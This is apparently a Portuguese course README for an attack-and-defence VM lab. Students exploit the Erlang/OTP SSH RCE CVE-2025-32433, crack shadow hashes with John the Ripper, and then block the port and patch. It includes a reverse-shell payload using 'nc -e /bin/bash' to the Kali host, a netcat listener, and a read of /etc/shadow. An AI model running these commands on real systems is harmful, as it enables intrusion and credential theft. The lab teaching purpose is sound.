
Este projeto simula um cenário realista de ataque e defesa em duas máquinas virtuais. Você irá explorar uma vulnerabilidade crítica de RCE pré-autenticação (CVE-2025-32433) em um servidor SSH Erlang/OTP, quebrar hashes de senha extraídos e, em seguida, endurecer a máquina vítima com regras de firewall e aplicação de patches.
Total de pontos: 20 | Prazo final: Não serão aceitas submissões atrasadas
Este projeto simula um cenário realista de ataque e defesa em duas máquinas virtuais. Você irá explorar uma vulnerabilidade crítica de RCE pré-autenticação (CVE-2025-32433) em um servidor SSH Erlang/OTP, quebrar os hashes de senha extraídos e, em seguida, endurecer a máquina vítima com regras de firewall e aplicação de patches.
| Função | SO |
|---|---|
| Atacante | Kali Linux |
| Vítima | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| Arquivo | Descrição |
|---|---|
Debian-1.ova | Imagem de VM da vítima pré-construída — baixe separadamente, veja Recursos (grande demais para o GitHub) |
Debian-1.ova): Link para download — grande demais (~3GB) para hospedar no GitHub. Baixe separadamente e importe no VirtualBox/VMware conforme descrito abaixo.rockyou_txt.txt): incluída neste repositório, usada na etapa de quebra de senha da Parte 2.Debian-1.ova e sua VM do Kali Linux no VirtualBox/VMware.ifconfig para descobrir o IP dela (normalmente em 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
Documente portas abertas, versões de serviços e assinaturas do Erlang.
Alterne temporariamente o Kali para NAT para clonar o repositório e, em seguida, volte para Host-Only.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Edite o script — defina HOST = "<victim-IP>" e atualize o payload:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminal 1 (Kali) — inicie o listener:
nc -lvnp 4444
Terminal 2 (Kali) — execute o exploit:
python3 CVE-2025-32433.py
No shell reverso, execute whoami e hostname para confirmar o acesso.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
Documente o formato do hash (por exemplo, $6$ = SHA-512), o tempo necessário e a senha em texto puro recuperada.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
Execute novamente a varredura Nmap e o exploit a partir do Kali — documente que a porta 2222 agora está "Filtered" e que o exploit falha.
Documente as etapas para atualizar o Erlang/OTP para v27.3.3 ou posterior, que contém a correção para a CVE-2025-32433.
whoami/hostname) e captura da flagCVE-2025-32433 — Execução remota de código crítica de pré-autenticação no servidor SSH Erlang/OTP. Explorável pelo envio de pacotes SSH malformados antes de qualquer troca de credenciais, concedendo a um atacante não autenticado acesso total ao shell.
Project Spring 2026 - Google Docs.pdf | Instruções completas do projeto com os entregáveis |
rockyou_txt.txt | Wordlist usada com o John the Ripper para quebrar o hash de senha extraído |